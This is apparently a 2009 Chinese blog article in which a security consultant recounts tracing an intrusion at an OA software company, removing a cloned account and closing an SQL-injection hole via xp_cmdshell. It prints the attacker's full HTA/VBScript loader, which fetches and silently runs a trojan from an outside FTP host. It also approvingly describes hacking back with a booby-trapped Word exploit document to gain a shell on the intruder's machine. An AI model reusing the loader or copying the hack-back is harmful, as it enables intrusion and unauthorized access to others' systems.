首页 电脑 电脑学堂 查看内容

反击、反击,抓住幕后的黑手

2009-2-11 08:44 653 0

摘要: By 曲莲飞 共分四部分: 序章:惊天的消息 初章:步步为营补漏洞 查出漏洞之源 尾章:绝地大反击 前言:想想自己做安全顾问也有几个月了,期间碰到的问题大大小小,但...
关键词: 入侵者 漏洞 系统 一个 公司 用户 端口 页面 后门 日志

By 曲莲飞 共分四部分: 序章:惊天的消息 初章:步步为营补漏洞 查出漏洞之源 尾章:绝地大反击 前言:想想自己做安全顾问也有几个月了,期间碰到的问题大大小小,但给我记忆最深的是一次在黑客反击战中的经历。 8月6日 晴 9:30pm惊天的消息 虽然自己是一家OA软件网站的安全顾问,但由于网站访问量不大,所以自己也就不太去管理。然而今天那家OA软件的朋友突然在MSN上告诉我一个惊天的消息:“他们公司的一个产品的计划文书被别人盗到网上去卖了”。晕,我问他计划文书明明是放在公司内部的电脑上,怎么会被轻易的盗走。他自己也觉得很纳闷。万般无奈下他希望我能帮他们修补一下漏洞并拜托我帮他们查一下原因,最好还能抓到入侵者。(有Money的~~)说了半天看来还是要我这个安全顾问出马呀。^_^ 与朋友分析了一下现在的情况觉得不太可能是公司内部的人干的(这可是要负法律责任的呦!)那么只有可能是同行搞的商业间谍活动。搞明白了入侵者的目的,我现在要做的就是修补好系统的漏洞,并设法抓住入侵者将他送给警察叔叔。嘻嘻 8月6日 晴 11:05pm步步为营补漏洞 休息了一会儿,便利用xp自带的远程桌面管理登陆到服务器,首先自然是要检查一下系统有没有被入侵者破坏,查看防火墙日志,里面空空如也。接着再查看系统安全日志里面也是空空如也,显然入侵者的警惕性很高,本来想通过日志追查入侵者的希望落空了(其实还是有办法的,往下看啦),呜呜…不过没关系,打起精神继续检查,由于很多入侵者都喜欢在入侵后安装个后门或者Rootkit来持久占有系统,为此我将目标锁定在了查后门上,利用已经装好的卡巴斯基自动查找后门,几分钟过去了一点收获都没有。不过自动的没用,我就用手动的,在命令提示符下输入netstat –na检查端口连接情况,可惜报告显示对外连接只有80、1433、3389这几个端口。难道是我猜错了他没装后门吗? 带着一丝忧虑我打开了“计算机管理”查看用户,好家伙,竟然多了一个名为Guest的用户,还有详细的说明文字,查看隶属还是属于Guests组,一切似乎做的象模象样。不过不管他如何布局到底还是给我看出破绽了,其实这个系统我在安装好后就已经将Guest用户删除了,想来这个新添加的用户必定是入侵者为了维持权限而克隆的用户。为了证实想法,我从硬盘中找了一个叫cca的软件,它就是专门用来检查是否有帐号被克隆的软件。一运行,cca就报告Guest用户是从Administrator中克隆来的。果不出所料,顺利删除Guest用户,并修改了管理员的密码。这时朋友在MSN上告诉我公司员工昨天登陆公司首页时防护墙总是弹出是否要mshta访问网络,问我怎么解决。Mshta?这不正是前一阵子闹得很凶的木马吗,按朋友所说是访问首页时出现错误,莫非入侵者将木马下到了网页中,不及多想赶忙用记事本打开公司首页,哈哈,果然发现有一处调用同目录下的sun.tsst文件语句,用记事本打开sun.tsst,看到如下东西: <html> <HTA:APPLICATION caption="no" border="none" showInTaskBar="no" windowState="minimize" width=0 height=0> <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' width=0 height=0></object> <script language="VBScript"> Dim fs, t Set fs = CreateObject("Scripting.FileSystemObject") Set t = fs.CreateTextFile("sun.txt",True) t.WriteLine("open 202.102.xx.xx") t.WriteLine("ftp") t.WriteLine("[email protected]") t.WriteLine("upload") t.WriteLine("lcd d:\") t.WriteLine("get hgz.exe") t.WriteLine("bye") t.Close wsh.Run "ftp -s:sun.txt",0,true wsh.Run "d:\hgz.exe" window.close </script> </html> 哈哈,这下我全明白了,原来入侵者为了能入侵到公司内网,利用社会工程学原理故意在网站首页文件中写了一句调用sun.tsst文件的语句,而sun.tsst文件则是调用灰鸽子木马的元凶,他负责向202.102.xx.xx这个ip中的upload目录中下载灰鸽子木马并在本地执行。这样公司人员便在访问网站时中了灰鸽子,而入侵者再利用灰鸽子的反相连接特性长驱直入到公司内网从而获得了绝密的计划文书。难怪连卡巴斯基都查不出来呢。删除这个罪魁祸首,看看时间不早了明天还要上课,便准备明天再战。临走时,写了一个批处理放到启动选项,至于有什么用,明天再解释吧。   8月7日 阴 8:50pm 查出漏洞之源 抽了个早点的时间继续我的计划,顺利登陆服务器,直接就查看昨天写的批处理所生成的日志,其实昨天的批处理的内容是这样的: time /t>>scanlog.log netstat -n –p tcp 10|find “:3389”>>scanlog.log 批处理的意思是每10秒钟查看一次连接3389端口的情况,并将当时的时间,连接的ip都记录下来,我主要是用它来查找入侵者的ip。打开scanlog.log发现了同时有两个人正连接着服务器的3389端口,一个是我的,另一个自然就是入侵者的了。记下他的ip:202.94.xx.x(北京)。看来他又通过漏洞夺回了控制权,为此我必须先找到漏洞的根源才能继续修补系统,否则就要陷入这种补了又漏,漏了又补的情况。继续查看昨天没有检查完的web日志,虽然网站的流量不大,但是web日志的数据量还是很可观的。为了节省时间我在服务器上装了个专业的分析日志的软件weblog 利用它可以很直观的看出每天访问量最高的页面。 交给软件自动分析后,我奇怪的发现公司网站访问量最高的页面竟是vote.asp――投票页面。这在公司的网站上是很不正常的,在自己的电脑上打开vote.asp页面并提交选项,返回页面时发现他是个带参数的统计页面。思来想去,唯一能说明它有这么大访问量的原因就是入侵者可能是通过这个页面利用SQL注射漏洞得到的管理员的权限。然而问题是一般的投票系统都是用的mdb数据库,而mdb数据库一般是不可能单独得到权限的。于是上MSN问朋友投票系统用的是什么数据库,得到的答案让我大吃一惊:SQL Server2000。(小小的一个投票系统加文章系统竟然要SQL Server我晕)问他有没有将扩展存储过程删除,得到的答案自然是没有。至此我也找到了漏洞出现的原因:入侵者首先用SQL注射漏洞配合SQL Server2000的xp_cmdshell扩展存储过程直接在系统中创建了一个管理员权限的用户(可怕呀^^)。而xp_cmdshell不仅可以添加用户,还可以作为一个无声的后门.汗颜! 但由于SQL Server2000的特殊性,如果只是单单删除xp_cmdshell扩展存储过程,那么入侵者还是可以将它恢复过来,为此还要将它所依赖的其他存储过程和文件删除。 在查询分析器中输入 use master sp_dropextendedproc ‘xp_cndshell’ 再转到SQL Server目录中将xpsql70.dll删除,呼真累呀。赶快再检查一遍系统,利用昨天的方法将原来的漏洞都补过来,再做的绝点用c3389这个小工具将远程登陆的端口由3389改成33998。踢走入侵者,这下入侵者应该进不来了吧。 将得到的ip地址和web日志一起交给朋友,让他与警察叔叔联系,嘻嘻。 而我下面的任务就是要给入侵者一点警告,来次大反击。当然那是明天的事了,先睡觉去也. 8月8日 小雨 9:32 绝地大反击 虽然现在外面下着小雨,但自己的心情格外的好,(要拿Money了 ^^)整个上午都在思考如何给入侵者来个反击,刚巧打开word时就想起了去年有个word的溢出漏洞(ms03-036),既然入侵者会用社会工程学欺骗那我也给他来个欺骗。先用word溢出工具生成一个带反向连接的word文档,虽然这个word文档是个溢出程序,但仍可以用word打开,不过里面全是乱码。将文档的名字改成“公司产品计划白皮书.doc”,再在自己的虚拟机中种下先前找到的灰鸽子木马,并用nc监听本机的2222端口。这样只要入侵者打开它时,我就能从入侵者的系统中反向得到一个用户级别的后门。一切布置妥当,现在就等着入侵者上钩。 大约过了半个小时,虚拟机中的nc程序有了动静,看样子他已经打开了那个word文档,顺利在入侵者的系统中的拿到了一个用户级别的shell。搜集一下他的硬盘还发现了他入侵公司时的资料,好,下载下来作为证据。临走时在他的桌面上写了一个警告信息,走人。呼,这下世界太平了。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部